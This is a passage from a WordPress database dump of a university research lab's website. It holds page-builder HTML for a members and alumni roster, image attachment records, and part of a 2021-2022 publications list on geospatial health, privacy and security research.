gutters-row-v-2 style-627 style-local-182-c173 position-relative\" data-colibri-id=\"182-c173\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c174-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c174 position-relative\" data-colibri-id=\"182-c174\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c175 position-relative h-element\" data-colibri-id=\"182-c175\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-817 style-629-image style-local-182-c175-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c175-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c176 position-relative\" data-colibri-id=\"182-c176\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c177-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c177 position-relative\" data-colibri-id=\"182-c177\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c178 position-relative h-element\" data-colibri-id=\"182-c178\">\n<div class=\"h-heading__outer style-632 style-local-182-c178\">\n<h4 class=\"\">Bronson Tharpe</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c179 position-relative h-element\" data-colibri-id=\"182-c179\">\n<div class=\"\">\n\nUndergrad student\n\n</div>\n</div>\n<div class=\"style-634 style-local-182-c180 position-relative h-element\" data-colibri-id=\"182-c180\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c181-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c181 position-relative\" data-colibri-id=\"182-c181\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c182 position-relative h-element\" data-colibri-id=\"182-c182\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-853 style-629-image style-local-182-c182-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c182-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c183 position-relative\" data-colibri-id=\"182-c183\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c184-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c184 position-relative\" data-colibri-id=\"182-c184\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c185 position-relative h-element\" data-colibri-id=\"182-c185\">\n<div class=\"h-heading__outer style-632 style-local-182-c185\">\n<h4 class=\"\">Ruby Parcells</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c186 position-relative h-element\" data-colibri-id=\"182-c186\">\n<div class=\"\">\n\n<span style=\"color: #4055a9; font-family: \'Open Sans\'; font-size: 16px; font-weight: 400;\">Undergrad student</span>\n\n</div>\n</div>\n<div class=\"style-635 style-local-182-c187 position-relative h-element\" data-colibri-id=\"182-c187\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Socicon (http://www.socicon.com)-->\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c188-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c188 position-relative\" data-colibri-id=\"182-c188\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c189 position-relative h-element\" data-colibri-id=\"182-c189\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-820 style-629-image style-local-182-c189-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c189-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c190 position-relative\" data-colibri-id=\"182-c190\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c191-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c191 position-relative\" data-colibri-id=\"182-c191\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c192 position-relative h-element\" data-colibri-id=\"182-c192\">\n<div class=\"h-heading__outer style-632 style-local-182-c192\">\n<h4 class=\"\">Anvith Anand</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c193 position-relative h-element\" data-colibri-id=\"182-c193\">\n<div class=\"\">\n\n<span style=\"color: #4055a9; font-family: \'Open Sans\'; font-size: 16px; font-weight: 400;\">Undergrad student</span>\n\n</div>\n</div>\n<div class=\"style-636 style-local-182-c194 position-relative h-element\" data-colibri-id=\"182-c194\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c195-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c195 position-relative\" data-colibri-id=\"182-c195\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c196 position-relative h-element\" data-colibri-id=\"182-c196\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1022 style-629-image style-local-182-c196-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sara.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c196-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c197 position-relative\" data-colibri-id=\"182-c197\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c198-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c198 position-relative\" data-colibri-id=\"182-c198\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c199 position-relative h-element\" data-colibri-id=\"182-c199\">\n<div class=\"h-heading__outer style-632 style-local-182-c199\">\n<h4 class=\"\">Sara Edwards</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c200 position-relative h-element\" data-colibri-id=\"182-c200\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Undergrad student</span>\n\n</div>\n</div>\n<div class=\"style-637 style-local-182-c201 position-relative h-element\" data-colibri-id=\"182-c201\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-628-outer style-local-182-c202-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-628 style-local-182-c202 position-relative\" data-colibri-id=\"182-c202\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-629 style-local-182-c203 position-relative h-element\" data-colibri-id=\"182-c203\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1050 style-629-image style-local-182-c203-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-629-frameImage style-local-182-c203-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-630 style-local-182-c204 position-relative\" data-colibri-id=\"182-c204\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-631-outer style-local-182-c205-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-631 style-local-182-c205 position-relative\" data-colibri-id=\"182-c205\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-632 style-local-182-c206 position-relative h-element\" data-colibri-id=\"182-c206\">\n<div class=\"h-heading__outer style-632 style-local-182-c206\">\n<h4 class=\"\">Ryan Garland</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-633 style-local-182-c207 position-relative h-element\" data-colibri-id=\"182-c207\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Undergrad student</span>\n\n</div>\n</div>\n<div class=\"style-634 style-local-182-c208 position-relative h-element\" data-colibri-id=\"182-c208\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-680 style-local-182-c212 position-relative\" data-colibri-component=\"section\" data-colibri-id=\"182-c212\">\n<div class=\"h-section-grid-container h-section-boxed-container\">\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-681 style-local-182-c213 position-relative\" data-colibri-id=\"182-c213\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-683-outer style-local-182-c214-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-683 style-local-182-c214 position-relative\" data-colibri-id=\"182-c214\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-684 style-local-182-c215 position-relative h-element\" data-colibri-id=\"182-c215\">\n<div class=\"h-heading__outer style-684 style-local-182-c215\">\n<h2 class=\"\">Alumni</h2>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-694 style-local-182-c216 position-relative\" data-colibri-id=\"182-c216\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-695-outer style-local-182-c217-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-695 style-local-182-c217 position-relative\" data-colibri-id=\"182-c217\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-700 style-local-182-c218 position-relative h-element\" data-colibri-id=\"182-c218\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-1359 style-700-image style-local-182-c218-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-ruby_parcells-scaled-1-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-700-frameImage style-local-182-c218-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-global-transition-all h-heading style-699 style-local-182-c219 position-relative h-element\" data-colibri-id=\"182-c219\">\n<div class=\"h-heading__outer style-699 style-local-182-c219\">\n<h4 class=\"\">Ruby Parcells</h4>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-696-outer style-local-182-c220-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-696 style-local-182-c220 position-relative\" data-colibri-id=\"182-c220\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\"></div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-697-outer style-local-182-c221-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-697 style-local-182-c221 position-relative\" data-colibri-id=\"182-c221\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\"></div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-698-outer style-local-182-c222-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-698 style-local-182-c222 position-relative\" data-colibri-id=\"182-c222\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\"></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>','Members','','inherit','closed','closed','','182-autosave-v1','','','2023-09-26 21:06:27','2023-09-27 01:06:27','',182,'https://gsudice.dataconn.net/?p=1388',0,'revision','',0),(1391,1,'2023-09-26 21:17:36','2023-09-27 01:17:36','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg','cropped-patterson.jpg','','inherit','open','closed','','cropped-patterson-jpg','','','2023-09-26 21:17:36','2023-09-27 01:17:36','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg',0,'attachment','image/jpeg',0),(1394,1,'2023-09-26 21:36:34','2023-09-27 01:36:34','','Screen Shot 2023-09-26 at 9.33.41 PM','','inherit','open','closed','','screen-shot-2023-09-26-at-9-33-41-pm','','','2023-10-13 10:26:41','2023-10-13 14:26:41','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/Screen-Shot-2023-09-26-at-9.33.41-PM.png',0,'attachment','image/png',0),(1399,1,'2023-09-26 22:33:56','2023-09-27 02:33:56','','sara edwards1','','inherit','open','closed','','sara-edwards1','','','2023-09-26 22:33:56','2023-09-27 02:33:56','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg',0,'attachment','image/jpeg',0),(1408,1,'2023-09-28 15:50:33','2023-09-28 19:50:33','','Portrait-1','','inherit','open','closed','','portrait-1','','','2023-09-28 15:50:33','2023-09-28 19:50:33','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/Portrait-1.jpeg',0,'attachment','image/jpeg',0),(1416,1,'2023-09-28 16:15:51','2023-09-28 20:15:51','','rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790','','inherit','open','closed','','rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790','','','2023-09-28 16:15:51','2023-09-28 20:15:51','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg',0,'attachment','image/jpeg',0),(1417,1,'2023-09-28 16:15:59','2023-09-28 20:15:59','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg','cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg','','inherit','open','closed','','cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-jpg','','','2023-10-13 10:35:20','2023-10-13 14:35:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg',0,'attachment','image/jpeg',0),(1418,1,'2023-09-28 16:24:27','2023-09-28 20:24:27','','colibri-image-54.png','','inherit','open','closed','','colibri-image-54-png','','','2023-09-28 16:24:27','2023-09-28 20:24:27','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/colibri-image-54.png',0,'attachment','image/png',0),(1419,1,'2023-09-28 16:24:27','2023-09-28 20:24:27','','colibri-image-55.png','','inherit','open','closed','','colibri-image-55-png','','','2023-09-28 16:24:27','2023-09-28 20:24:27','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/colibri-image-55.png',0,'attachment','image/png',0),(1420,1,'2023-09-28 16:24:27','2023-09-28 20:24:27','','colibri-image-56.png','','inherit','open','closed','','colibri-image-56-png','','','2023-09-28 16:24:27','2023-09-28 20:24:27','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/colibri-image-56.png',0,'attachment','image/png',0),(1422,1,'2023-09-29 10:16:14','2023-09-29 14:16:14','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\r\n <!---->\r\n <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-boxed-container\">\r\n <!---->\r\n <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\r\n <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p><strong>2022</strong></p>\r\n <p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\r\n <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and\r\n Management in Rural Communities in Accra, Ghana: A Field Study Report.</p>\r\n <p><strong>2021</strong></p>\r\n <p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.</p>\r\n <p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\r\n <p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\r\n <p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\r\n <p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\r\n <p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\r\n <p>O’Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\r\n <p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\r\n <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\r\n <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\r\n <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\r\n (pp. 1-6). IEEE.</p>\r\n <p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\r\n (pp. 631-640). IEEE.</p>\r\n <p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\r\n (pp. 505-506).</p>\r\n <p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\r\n <p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\r\n (S3) Workshop (pp. 1-2).</p>\r\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\r\n <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\r\n <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\r\n <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted\r\n Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\r\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\r\n <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., 